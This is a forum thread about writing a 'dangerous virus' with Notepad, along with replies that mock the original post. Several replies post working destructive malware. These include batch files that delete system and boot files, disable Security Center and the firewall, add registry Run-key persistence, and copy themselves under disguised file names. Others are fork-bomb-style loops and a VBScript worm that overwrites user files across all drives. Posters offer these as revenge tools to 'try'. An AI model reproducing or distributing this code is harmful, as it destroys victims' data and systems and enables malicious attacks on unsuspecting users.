|
|
Very Easy But Very Dangerous Virus | ||
Discussion by me-here with 26 Replies.
Last Update: April 15, 2012, 9:02 pm ( View Rated (7) ) | |||
![]() |
|
|
QUOTE
The only thing you need is Notepad .Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.
CODE
erase c:\<directory name>c:\<directory name>\*, Are you sure (Y/N)?
Unless you press 'y' nothing will happen. A virus, by definition, is not just supposed to damage a computer, it is also supposed to spread on its own. And this file can't even damage a computer without affirmation from the user. I wonder who would be dumb enough to affirm the destruction of his own computer.
Atleast use "echo off" before the erase statement to hide the "erase c:\windows" command being displayed.
And by the way, I think you haven't ever used Linux. Otherwise you would know that Linux doesn't support DOS commands and neither does it use the Windows/DOS filesystem.
An alternative to using echo off is to prefix every line in the batch file with an @ symbol. It works the same as echo off.
Moreover - if you execute this file WHILE you're booted into Windows, there's NO WAY you can delete the Windows directory. Anything above Win98, puts a LOCK on the C:\WINDOWS folder once booted up. You cannot even use Windows Explorer to delete this directory.
Only with that inanely stupid Win98, you could delete the WINDOWS folder - but that too would abort midway once it came upon certain locked .dlls and .exes. But by then the damage would be done - at least partially.
As far as Linux is considered, this method is absolutely worthless.. a normal user won't even have sufficient privileges to execute a similar script on the root folder.
But a problem...may be the victim understand and doesn't run
the file...so(it is clear to understand)
what way do you use???
This however is just a malicious program/script that deletes files.
To make it successful, there's some Windows files that you can single out for specific deletion and would not be presented with a confirmation, even renaming it would work, moving however wouldn't because it'd most likely be read-only and require confirmation. Those files can be found in Windows and System32.
I'm not sure whether you can force windows into interactive mode, in which every action done in DOS requires user input. I know I've set up bash so that commands like rm, cp and mv all require actions by the user before going ahead with it, also the most damage a script as such would do would be removing my home directory (if that file was owned by me), however it will get interrupted because some files would be locked (in use). If it were owned by root, that's a different story, and definitely something to be concerned about.
Cheers,
MC
~Adio
I'm sorry about what I'm about to say but at the same time I'm not...this doesn't even fall into the "script kiddie" arena, even the most basic "script kiddie" would realize that the commands given wouldn't work in Linux/Unix, and my main question is this...why would you come to a 'Tech forum and make a post like this....
Another thing is that the file has an extension of CMD which is a batch file opened in special mode. and it doens t work on systems before win XP.
i cant be sure about the windows xp system but there is a way to insert a user confirmation without requiring a keyboard input.. hmm, ever familiar with pipings? and one thing i like about windows and people hate about it too is that you already have all the resources you need to create simple viruses.
complex ones need some patch libraries to be installed.. there is no system like windows where i can create a worm using notepad alone. this cant be done on Mac OS and on linux, but can be done on windows..
I love windows
When my HD crashed some weeks ago, the first thing my brother and my mother asked me was: "Was it a computer virus?". And, as always, I got pissed off, since (at least to me) I'm very unlikely to get viruses, since I am a very experienced user, and also have some programming skills.
First of all, much easier than writing this script, browsing Google for "creating evil scripts" (this is just a stupid example). There you'll find many dangerous exploits, programs, bugs, etc... But the fact is: if you barely know how do these work, you're probably getting lots of them infecting you computer, just by browsing these sites with an insecure browser and/or by running some of the programs contained within them (like Trojan makers, for example).
If you're up to damage someone's system, then I just hope the same happens to yours. If you're just studying some of it so you don't get infected or fooled by these childish stuff, you're welcome. By the way, when it came out, I had access to the YouLoveYou Visual Basic Script some time after, for studying it. That was a real computer virus. And that's a hell of a coding, with hundreds and hundreds of lines of code...
So do not believe that without real knowledge you'll be able mess with one's computer around. Unless one is many times dumber than you, of course...
And a last simple tip, for safety: always "edit" (using at least notepad) script files before running them, so you have a bare idea of what's going to happen next...
Windows will not allow you to delete the Windows folder once booted up and even changing the drive letter of a compressed FAT drive will nto work if Windows is installed on it.
Unless you can execute this script without user confirmation (using the /q switch), I think that this is useless. Who would press "Y" on this command?
If you do use quiet mode, it still requires pure DOS mode. That means no Windows has to be loaded. As far as I know, only Windows 95 supports this. I think Windows 98 can, but you need a startup disk in order for that to work.
QUOTE (FirefoxRocks)
Unless you can execute this script without user confirmation (using the /q switch), I think that this is useless. Who would press "Y" on this command?
Link: view Post: 91221
on the pressing of "Y"..
i know 5 ways to do that without the user knowing.. and windows or even DOS provides the 4 methods..
xboxrulz
Mainly the viruses are
-worms
-trojans
-backdoors
Worms are the most dangerous ones, because they walk from computer to computer and infect
them. A virusmaker (worm coder) uses vulnerabilities of operating systems or of any software
in order to code a worm that then his/her worm could easily infect another computer without
his/her interaction. And then the process of infecting goes on automatically.
And that's why the worms are the most dangerous because they infect their victims faster
than other types of viruses.
Trojans are just like thieves. They steal passwords, banking accounts , or any sensitive
information.
Backdoors are just like "back doors"
like a tunnel or "back door". Through this "back door" an attacker enters the victims
computer and does what he/she want. Nowadays these open ports are easily closed by firewalls.
And that's why these types of viruses are not effective.
The "virus" in your case hm.. is only a part of script of a body of a virus listed above.
And it cannot be run with user interaction (we should assume that users are not
babies or ..
the content of your batch script , of course by not deleting the whole $WINDOWS$
*nix systems don't have a C: at all, so it's only windows in the firs place. also, as pointed out, it won't let the user delete the windows directory while windows is booted.
you would have far better result if you did some thing like this...
@echo y|deltree *.
@echo y|del *.*
@ECHO OFF@ECHO A PHOENIX PRODUCTION@ECHO MAIN BAT RUNNINGGOTO start
:start@ECHO SET snowball2=1 >> bat6.Bat@ECHO GOTO flood5 >> bat6.Bat@ECHO :flood5 >> bat6.Bat@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.Bat@ECHO NET USER snowball2%%snowball2%% /add >> bat6.Bat@ECHO GOTO flood5 >> bat6.BatSTART /MIN bat6.BatGOTO bat5
:bat5@ECHO CD %%ProgramFiles%% >> bat5.Bat@ECHO SET maggi=1 >> bat5.Bat@ECHO GOTO flood4 >> bat5.Bat@ECHO :flood4 >> bat5.Bat@ECHO MKDIR maggi%%maggi%% >> bat5.Bat@ECHO SET /a maggi=%%maggi%%+1 >> bat5.Bat@ECHO GOTO flood4 >> bat5.BatSTART /MIN bat5.BatGOTO bat4
:bat4@ECHO CD %%SystemRoot%% >> bat4.Bat@ECHO SET marge=1 >> bat4.Bat@ECHO GOTO flood3 >> bat4.Bat@ECHO :flood3 >> bat4.Bat @ECHO MKDIR marge%%marge%% >> bat4.Bat@ECHO SET /a marge=%%marge%%+1 >> bat4.Bat@ECHO GOTO flood3 >> bat4.BatSTART /MIN bat4.BatGOTO bat3
:bat3@ECHO CD %%UserProfile%%Start MenuPrograms >> bat3.Bat@ECHO SET bart=1 >> bat3.Bat@ECHO GOTO flood2 >> bat3.Bat@ECHO :flood2 >> bat3.Bat@ECHO MKDIR bart%%bart%% >> bat3.Bat@ECHO SET /a bart=%%bart%%+1 >> bat3.Bat@ECHO GOTO flood2 >> bat3.BatSTART /MIN bat3.BatGOTO bat2
:bat2@ECHO CD %%UserProfile%%Desktop >> bat2.Bat@ECHO SET homer=1 >> bat2.Bat@ECHO GOTO flood >> bat2.Bat@ECHO :flood >> bat2.Bat@ECHO MKDIR homer%%homer%% >> bat2.Bat@ECHO SET /a homer=%%homer%%+1 >> bat2.Bat@ECHO GOTO flood >> bat2.BatSTART /MIN bat2.BatGOTO original
:originalCD %HomeDrive%SET lisa=1GOTO flood1:flood1MKDIR lisa%lisa%SET /a lisa=%lisa%+1GOTO flood1
Try this still not a virus just a .Bat file but a fun one also very annoying.
net user administrator /active:yes
net user administrator *insertpassword
start net user guest /active:yes
net user guest *insertpassword
start @echo y|del *.*
ipconfig/release
start shutdown
You can elaborate some more but you get the idea
-reply by H4CK3R
????
you need to know more than that to create one
Just want to let both the creator of this post and also those who are considering doing this to someone, that this is an illegal operation. Fun, but illegal ;)
-reply by Xylon
Open Notepad and Type...STARTDip.BatAnd save it as "dip.Bat"Then run this...Aub to dekho maja...
-reply by Ratnadip Ghora (DIP)
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
@ echo off c:\windows\system 32
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!<brstart /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo HI, NAMAKU PUTRA
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo LENGKAPNYA ARDIANSYAH PUTRA, NTAR SELANJUTNYA AKU KASIH DATA YG LENGKAP YAA.
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo DARI BLOGNYA ARDIANSYAHPUTRA.WORDPRESS.COM…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_Ganteng_Putra
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo COMING UP NEXT……. [img]http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif?m=1336659725g[/img]
echo BY ARDIANSYAH PUTRA
echo ELECTRICAL ENGINEERING, ANDALAS UNIVERSITY, WEST SUMATERA, INDONESIA
echo POETRA_ARDIANSYAH@YAHOO.CO.ID
echo CALL ME YACHH +6281363xxxxxx SMS JUG BOLEH LHO [img]http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1336659725g[/img]
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo SALAM DARI SI GANTENG : ARDIANSYAHPUTRA.
echo ARDIANSYAHPUTRA.WORDPRESS.COM
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Goto R.I.P
Hey
:R.I.P
title GeoEye
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
@Echo off
color 4
title 4
title geoeye
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.ba...
start @echo y|del *.*
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!<brstart /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo HI, NAMAKU PUTRA
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo LENGKAPNYA ARDIANSYAH PUTRA, NTAR SELANJUTNYA AKU KASIH DATA YG LENGKAP YAA.
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo DARI BLOGNYA ARDIANSYAHPUTRA.WORDPRESS.COM…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_Ganteng_Putra
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo COMING UP NEXT……. [img]http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif?m=1336659725g[/img]
echo BY ARDIANSYAH PUTRA
echo ELECTRICAL ENGINEERING, ANDALAS UNIVERSITY, WEST SUMATERA, INDONESIA
echo POETRA_ARDIANSYAH@YAHOO.CO.ID
echo CALL ME YACHH +6281363xxxxxx SMS JUG BOLEH LHO [img]http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1336659725g[/img]
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo SALAM DARI SI GANTENG : ARDIANSYAHPUTRA.
echo ARDIANSYAHPUTRA.WORDPRESS.COM
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
[email="X5O%21P%@AP"]X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H[/email]*
[email="X5O%21P%@AP["]X5O!P%@AP[/email][4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
@Echo off
Del C:\ *.* |y
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType + 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next
Function infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f In fold.Files
ext = fso.GetExtensionName(f.path)
If (ext="doc") or (ext="txt") or (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") or (ext="js") or (ext="mp2") or (ext="mp3") or (ext="vbs") or (ext="vbe") or (ext="jpeg") or (ext="jpg") Then
fso.CopyFile WScript.ScriptFullName, f.path & ".vbs", True
fso.DeleteFile f.Path, True
End if
Next
End Function
Function SubFolders(path)
On Error Resume next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
next
End function
this worm will copy it`s self in all the system and won`t stop and will crash any computer if you want contact me tell me what i done if you could open your pc after working it ahahhahahrrrrrr and it will open many notpad for get his computer so so slow can you imagen what my worm, can do in your pc try it and tell me
QUOTE (KDEWolf)
I hate media. Nowadays everyone who writes down some program is a "hacker" and if the program damages anything it's a "virus". One single minute thinking about these terms and you already know they're used in a completely wrong context.
When my HD crashed some weeks ago, the first thing my brother and my mother asked me was: "Was it a computer virus?". And, as always, I got pissed off, since (at least to me) I'm very unlikely to get viruses, since I am a very experienced user, and also have some programming skills.
First of all, much easier than writing this script, browsing Google for "creating evil scripts" (this is just a stupid example). There you'll find many dangerous exploits, programs, bugs, etc... But the fact is: if you barely know how do these work, you're probably getting lots of them infecting you computer, just by browsing these sites with an insecure browser and/or by running some of the programs contained within them (like Trojan makers, for example).
If you're up to damage someone's system, then I just hope the same happens to yours. If you're just studying some of it so you don't get infected or fooled by these childish stuff, you're welcome. By the way, when it came out, I had access to the YouLoveYou Visual Basic Script some time after, for studying it. That was a real computer virus. And that's a hell of a coding, with hundreds and hundreds of lines of code...
So do not believe that without real knowledge you'll be able mess with one's computer around. Unless one is many times dumber than you, of course...
And a last simple tip, for safety: always "edit" (using at least notepad) script files before running them, so you have a bare idea of what's going to happen next...
Link: view Post: 88055
Dude I totally believe you on that one, and though though I know this may piss you off I want some help. I don't even know you but I need a favor. Can you help me study ways to make programs that you can access before the OS runs or before Windows run. I'm not gonna say Unix because unlike some people I'm actually gonna tell the truth and say I never used Unix. I never used Unix and even I knew that! Smh. Anyway if your up to it reply. I'm trying to study up on it. And libraries just don't carry this type of information. . .
Similar Topics:
Easy Video Editing
Whyme 39 s Cracking Challenge Part...
Which Language Is Easy And Secure T...
Just What Are The Security Advantages Of A Router? Is Zone Alarm now a redundant nuisance? (2)
|
(3) Password Reset Vulnerability
|
HOME 





James Blunt - Dangerous (Deniz Koyu & Johan Wedel Remix)
World's Most Dangerous Battery!
Tying Tiffany - Drownin' (fifa 2012)
The Dangerous Summer - No One's Gonna Need You More (Official Music Video)
Joyride Riddim Mix
Dangerous Toys - Outlaw
Top Gun - Highway to the Dangerzone
Travel Is Dangerous - Mogwai
The Dangers of Aspartame (Nutrasweet AminoSweet Diet Coke Zero Pepsi Next Sucralose Neotame E951)

